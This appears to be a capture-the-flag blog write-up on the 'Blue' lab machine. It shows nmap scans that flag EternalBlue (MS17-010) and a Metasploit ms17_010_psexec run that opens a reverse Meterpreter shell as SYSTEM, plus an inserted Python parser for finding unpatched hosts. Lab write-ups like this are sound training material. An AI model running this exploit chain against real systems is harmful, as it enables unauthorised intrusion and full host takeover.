Following on from Legacy in number of pwns is Blue. I have heard of this one, and the name is a giveaway. Is it pretty much a clone of Legacy?


Not exactly; there are a bunch more ports for a start:

135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown


We’ll do the same scan as Legacy:

└─# nmap -p445 --script smb-vuln-ms17-010
Starting Nmap 7.91 ( ) at 2021-03-05 05:42 EST
Nmap scan report for
Host is up (0.24s latency).

445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

And we’ll get the same result.
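As an added example (not part of the original writeup), here is a small Python parser for nmap's normal output in the form shown above: it pulls each host's `smb-vuln-ms17-010` verdict, CVE ids and risk factor into a patch queue, and treats hosts where the script gave no verdict (for example, it could not connect) as UNKNOWN rather than clean. The sample scan text and its addresses are constructed.

```python
import re

# Constructed sample: nmap normal output for the smb-vuln-ms17-010 script,
# modelled on the scan above (addresses are placeholders).
SAMPLE_SCAN = """\
Nmap scan report for 10.0.0.5
Host is up (0.24s latency).
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14

Nmap scan report for 10.0.0.6
Host is up (0.10s latency).
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'
"""

def parse_ms17_010(report):
    """One record per host: address, script State (UNKNOWN when the script
    gave no verdict, e.g. it could not connect), CVE ids and risk factor."""
    hosts, current = [], None
    for line in report.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            current = {"host": m.group(1), "state": "UNKNOWN", "cves": [], "risk": None}
            hosts.append(current)
        elif current is not None and line.startswith("|"):
            body = line.lstrip("|_ ").strip()   # drop the script-output gutter
            if body.startswith("State:"):
                current["state"] = body.split(":", 1)[1].strip()
            elif body.startswith("IDs:"):
                current["cves"] = re.findall(r"CVE-\d{4}-\d+", body)
            elif body.startswith("Risk factor:"):
                current["risk"] = body.split(":", 1)[1].strip()
    return hosts

def vulnerable_hosts(report):
    """Addresses the scan flagged VULNERABLE: these need MS17-010 applied."""
    return [h["host"] for h in parse_ms17_010(report) if h["state"] == "VULNERABLE"]

if __name__ == "__main__":
    print(vulnerable_hosts(SAMPLE_SCAN))  # ['10.0.0.5']
```

Hosts that come back UNKNOWN should be re-checked with credentials or from the patch inventory rather than assumed fixed.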

Yeeting MSF again again

I’ve never used Metasploit three times in an evening before. First time for everything I guess:

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 
[*] - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] - Built a write-what-where primitive...
[+] - Overwrite complete... SYSTEM session obtained!
[*] - Selecting PowerShell target
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-03-05 05:45:16 -0500

meterpreter > shell
Process 1564 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

Well, it’s a different version of the OS I guess. Devel will be next, but that’s for tomorrow.